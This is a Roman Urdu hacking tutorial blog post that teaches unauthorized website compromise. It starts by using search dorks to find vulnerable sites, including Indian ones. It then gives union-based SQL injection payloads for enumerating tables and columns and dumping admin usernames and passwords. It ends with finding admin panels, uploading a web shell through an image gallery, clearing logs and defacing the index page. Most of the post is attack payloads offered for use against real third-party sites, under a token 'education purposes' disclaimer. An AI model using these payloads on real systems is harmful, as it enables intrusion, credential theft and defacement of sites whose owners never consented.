All Hacking Tools And Hacking Tutorials Are Only For Education Purposes,..

How To Hack A Website SQL InjecTion Tutorial In urdU

SQL InjecTion Tutorial In urdU




  Sab Se Pehele Aap download KAren!
[+] FireFox!
[+] HackBar
[+] havij for finding Admin Panel
[+] 1 or 2 Vulnerable Website

Ab Ham Apna Tutorial Start Karty Hain.
 

<- a="" r="" s="" t="-"> Panda
Ye Search engine Kholen! ghost
Or Search Karen!
Special Dorks!
Yah Kuch Aham Dorks Hain......
inurl:index.php?id=
inurlages.php?id=
inurl:images.php?id=
Agar 13000+ dorks Download Karnay Hain To Yahaan Say Download Kar Lain
India Ki Vulnerable websites Kese Dhoonden?????
Apna Dork google Per Likhen
Or site: .in Aakhir Main Likhden

 For Example:-)

inurl:images.php?id= site:.in
 
Ok Ab Tayyar hoajyen :*
hamain Kya Dhoondna hai???
 
Vulnerable web
Tables
Column

  Admin Panel And shell Uploading
Defacing
 
Ok To Ye Hai ApnI VulneRable Website!
Kese check KAren ye Site vulnerable hai?? bus

Ye Vulnerable web K End Main Lagayen!
Example:-)

http://www.vuln.in/index.php?id=15'
Aise

 http://www.vuln.in/index.php?id=15 Order by 6
1 errorr Aagaya Unknown Column in order To Clause "6"
Iska Matlb http://www.vuln.in/index.php?id=15 Per Sirf 5 hi Columns hain

Ab Union Select Waala Method Start :-)
union Find Karne Se Pehele Vuln Web Ki Value Per - Lagaden !
Example :-)

http://www.vuln.in/index.php?id=15 Order by 1

Simple page

http://www.vuln.in/index.php?id=15 Order by 2

Simple Page

http://www.vuln.in/index.php?id=15 Order by 3

Simeple page

http://www.vuln.in/index.php?id=15 Order by 4

                                    Simple Page

                  http://www.vuln.in/index.php?id=15 Order by 5

                                    Simple Page


http://www.vuln.in/index.php?id=-15
Aise

Or Ab Vulnerable column Find Karen!

http://www.vuln.in/index.php?id=-15 Union Select 1,2,3,4,5 vuln web per sirf 5 Columns the!
Phir Kuch Numbers Screen Per Aajeynge Jese 2 3 etc....!smile
Jo Sub Se Zyada Dark Or Bold Ho Wo Sab Se Zyada Vulnerable hai!
Sochen 2 Sab Se Zyada Dark Or Bold hai!

Ab Tables Found KArne Waal Method Start :-)

Table Found KArne K Liye Sab Se Zyada Dark Or Bold Number "2" Ko Hatake !
ye Likhen

group_concat(table_name)
or Phir Aakhir main

from information_schema.tables where table_schema= database ()--
Example:-)
http://www.vuln.in/index.php?id=-15 union Select
1,group_concat(table_name),3,4,5 from information_schema.tables where
table_schema= database ()--
Aise Likhna Hai 2 Ki Jaga Per
So ye hamain Table DedeGa magar Dihaan rahe Sab Kuch Theek Likeyega warna 
My_sql Fetch error Aajayega!Cool
  • Like:-) admin,user,post,contacts,timing,gallery, etc etc...!
hamain chahiye Admin Table ! Ab Apna hackBar kholeye Jo k 1 FireFox Addon hai!
Or wahan MySql Likha Hai Wahan Ja Kar CHAR Menu Kholen Or Likhen "Admin"!
Or Wo Kuch Is Tarha Char Dega CHAR(12,13,14,21,43,235,2365,21,) Ye Real nahi hai!
Ok!

ab Aapko
es
group_concat(table_name)
Ki Jagah kiss
group_concat(column_name)
Likhna hOgA  Or form
Information_schema.tables
Ki Jagah
information_schema.columns
Likhna hai Or
table_schema=
Ki Jagah per
table_name
Likhna hai
Example:-)
Code:
http://www.vuln.in/index.php?id=-15 union Select
1,group_concat(column_name)3,4,5 from information_schema.columns where
table_name= ChaR (1,2,13,1,3,2142,354,234,)
 
Ab Column Finding, Method Start,..

Ab aapko Apni vulnerable Web k Aage Ye Karna hai Jo neeche hai
http://www.vuln.in/index.php?id=-15 union Select
1,group_concat(column_name)3,4,5 from information_schema.columns where
table_name= ChaR (1,2,13,1,3,2142,354,234,)
Done
to Phir Ye aapko Kuch Istarha Dega
logs,username,password,date etc
 
Lakin hamain username and Password Chahiye!

ab Password Kese nikaalen??? Don't Worry Neeche hai sab Kuch
http://www.vuln.in/index.php?id=-15 1,group_concat(username,0x3a,Password) from admin
 
Or Pass Aapka
90% Times Pass Encrypted Hota Hai Like MD5,MD2,SHa=1 etc etc!
To Isse Decrypt Karna Parta hai ! Maine 100 se zyada Web Hack Ki Lekin Decrypted Pass Or Admin panel nahi mila hahahaha!
Ok Ab Ap Apna havij Open KAren Or usmain Apni vulnerable Link daalen Aise !


Sirf Address Daalen Phir Find Admin Per CLick KAren!
http://www.vuln.in/admin
http://www.vuln.in/administrator
http://www.vuln.in/controlpanel :'D
http://www.vuln.in/kpanel etc etc!
Es Tarha Sab Result Show Ho Jain Gay.....
Ab Aagay...
Ab  
 Open KAren!
Or username And Pass Daalen!
Or aB Aap Web main hain
ab Ager chahen To Shell UPload KAr Sakte hain !
Ager Apne Logs Clear Karna Chahte hain To KArna Parega xD
Phir Uploading Option dhoonden !

Gallery Main images upload Is Best for uploading Shell :X
Ab Aap Apna Shell uPload KAren or deface Karden index.php ko edit kar ky site deface kar dain
 
 
Agar Koi Baat Na Samajh Aai Ho To BilaJhijak Comment Karain...
Shukarya
 

Please Share This Post With Your Frinds :) FOCSoft
SOCIALIZE IT →
FOLLOW US →
SHARE IT →

1 Comments:

  1. How can we protect our php site from such kind of injections and shells please tell us that too which is more important then hacking others site...

    ReplyDelete

If you're having issues, Please leave an email address I can contact you on -
I advise you to also "subscribe to the comment feed" and get email updates when I respond to your question.

Hyperlinks are not allowed, Spam/advertising comments will NEVER BE TOLERATED and will be deleted immediately!

Thanks for reading,
Administrator Of FOCSoft

Stay Updated With Facebook
Please Click Like Button

Receive Free Updates (EMail):

Powered By FOCSoft